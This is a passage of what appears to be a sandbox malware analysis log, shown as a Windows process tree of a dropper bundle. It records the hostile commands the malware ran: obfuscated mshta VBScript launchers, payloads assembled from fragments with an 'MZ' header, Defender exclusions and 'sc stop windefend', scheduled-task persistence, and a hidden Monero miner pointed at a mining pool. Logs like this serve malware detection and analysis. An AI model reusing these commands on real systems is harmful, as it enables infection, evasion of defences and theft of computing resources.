                                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                          9⤵
                                                                            PID:4312
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                              10⤵
                                                                                PID:2392
                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                              "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                              9⤵
                                                                                PID:6000
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                  10⤵
                                                                                    PID:5124
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                      11⤵
                                                                                        PID:1100
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                        11⤵
                                                                                          PID:6060
                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                          control .\R6f7sE.I
                                                                                          11⤵
                                                                                            PID:6824
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                              12⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:4440
                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                13⤵
                                                                                                  PID:4404
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                    14⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5776
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /F -Im "Sun158d8ef840.exe"
                                                                                        8⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4244
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe
                                                                                4⤵
                                                                                  PID:2948
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun1507db358fce61c0b.exe
                                                                                    Sun1507db358fce61c0b.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4072
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 284
                                                                                      6⤵
                                                                                      • Program crash
                                                                                      PID:2468
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe
                                                                                  4⤵
                                                                                    PID:4328
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun152e52d07b74d9b5.exe
                                                                                      Sun152e52d07b74d9b5.exe
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5004
                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                        6⤵
                                                                                          PID:3416
                                                                                          • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4768
                                                                                          • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                            7⤵
                                                                                              PID:2620
                                                                                              • C:\Users\Admin\AppData\Roaming\5080400.scr
                                                                                                "C:\Users\Admin\AppData\Roaming\5080400.scr" /S
                                                                                                8⤵
                                                                                                  PID:2544
                                                                                                • C:\Users\Admin\AppData\Roaming\6563257.scr
                                                                                                  "C:\Users\Admin\AppData\Roaming\6563257.scr" /S
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                  PID:4552
                                                                                                • C:\Users\Admin\AppData\Roaming\1059307.scr
                                                                                                  "C:\Users\Admin\AppData\Roaming\1059307.scr" /S
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Windows security modification
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • System policy modification
                                                                                                  PID:5780
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\AdvancedRun.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                    9⤵
                                                                                                      PID:7044
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\test.bat"
                                                                                                        10⤵
                                                                                                          PID:1060
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1059307.scr" -Force
                                                                                                        9⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:2468
                                                                                                      • C:\Users\Admin\AppData\Roaming\1059307.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\1059307.scr"
                                                                                                        9⤵
                                                                                                          PID:6864
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1059307.scr" -Force
                                                                                                          9⤵
                                                                                                          • Checks processor information in registry
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:2828
                                                                                                      • C:\Users\Admin\AppData\Roaming\4209305.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\4209305.scr" /S
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Windows security modification
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • System policy modification
                                                                                                        PID:6004
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\AdvancedRun.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                          9⤵
                                                                                                            PID:7160
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\test.bat"
                                                                                                              10⤵
                                                                                                                PID:2752
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc stop windefend
                                                                                                                  11⤵
                                                                                                                    PID:3504
                                                                                                              • C:\Users\Admin\AppData\Roaming\4209305.scr
                                                                                                                "C:\Users\Admin\AppData\Roaming\4209305.scr"
                                                                                                                9⤵
                                                                                                                  PID:3988
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    10⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4668
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\4209305.scr" -Force
                                                                                                                  9⤵
                                                                                                                    PID:2380
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\4209305.scr" -Force
                                                                                                                    9⤵
                                                                                                                      PID:6892
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 2612
                                                                                                                      9⤵
                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                      • Program crash
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:3128
                                                                                                                  • C:\Users\Admin\AppData\Roaming\6747983.scr
                                                                                                                    "C:\Users\Admin\AppData\Roaming\6747983.scr" /S
                                                                                                                    8⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:444
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2448
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 240
                                                                                                                    8⤵
                                                                                                                    • Program crash
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:5824
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sad.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\sad.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5184
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5448
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FE4EG.tmp\setup.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FE4EG.tmp\setup.tmp" /SL5="$1028C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                    8⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5720
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                      9⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5872
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-GC8V6.tmp\setup.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-GC8V6.tmp\setup.tmp" /SL5="$30204,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                        10⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:3476
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-NIJ96.tmp\postback.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-NIJ96.tmp\postback.exe" ss1
                                                                                                                          11⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:424
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5276
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5688
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 296
                                                                                                                    8⤵
                                                                                                                    • Program crash
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:1480
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5852
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zyl-game.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1576
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                                                  7⤵
                                                                                                                    PID:2988
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                      8⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:5696
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5632
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                      8⤵
                                                                                                                        PID:5536
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                          9⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:2960
                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                        8⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5036
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                          9⤵
                                                                                                                            PID:2164
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                              10⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:5068
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                            9⤵
                                                                                                                              PID:2012
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                              9⤵
                                                                                                                                PID:7156
                                                                                                              • C:\Windows\System32\Upfc.exe
                                                                                                                C:\Windows\System32\Upfc.exe /launchtype periodic /cv kTrHMZfwcUWpHuvjWOSSeA.0
                                                                                                                1⤵
                                                                                                                  PID:4648
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2996
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2088
                                                                                                                • C:\Windows\System32\sihclient.exe
                                                                                                                  C:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.2
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:496
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                  1⤵
                                                                                                                    PID:3076
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4072 -ip 4072
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    PID:1288
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4136 -ip 4136
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    PID:1348
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2216 -ip 2216
                                                                                                                    1⤵
                                                                                                                      PID:1548
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                      1⤵
                                                                                                                        PID:5468
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
                                                                                                                          2⤵
                                                                                                                            PID:5920
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                                                                                                                              ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5680
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                                                                4⤵
                                                                                                                                  PID:3700
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
                                                                                                                                    5⤵
                                                                                                                                      PID:4564
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )
                                                                                                                                    4⤵
                                                                                                                                      PID:6024
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                                                                                                                                        5⤵
                                                                                                                                          PID:5928
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                                                                                                                                            6⤵
                                                                                                                                              PID:4648
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                              6⤵
                                                                                                                                                PID:1960
                                                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                                                control ..\kZ_AmsXL.6G
                                                                                                                                                6⤵
                                                                                                                                                  PID:1916
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                    7⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:6508
                                                                                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6724
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
                                                                                                                                                          9⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:7092
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill -f /Im "sfx_123_206.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5928
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 2644 -ip 2644
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:1740
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5688 -ip 5688
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:4732
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2448 -ip 2448
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:5312
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          1⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:2392
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 456
                                                                                                                                            2⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:1892
                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          1⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          PID:5040
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2392 -ip 2392
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:5348
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2620 -ip 2620
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:6208
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                          PID:4952
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5292 -ip 5292
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:6648
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1548 -ip 1548
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:4740
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1896 -ip 1896
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:1924
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5892 -ip 5892
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                          PID:5784
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1944 -ip 1944
                                                                                                                                          1⤵
                                                                                                                                            PID:3128
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6004 -ip 6004
                                                                                                                                            1⤵
                                                                                                                                              PID:1448
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5712 -ip 5712
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:6180
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5480 -ip 5480
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              PID:4940
                                                                                                                                            • C:\Windows\system32\cmd.exe
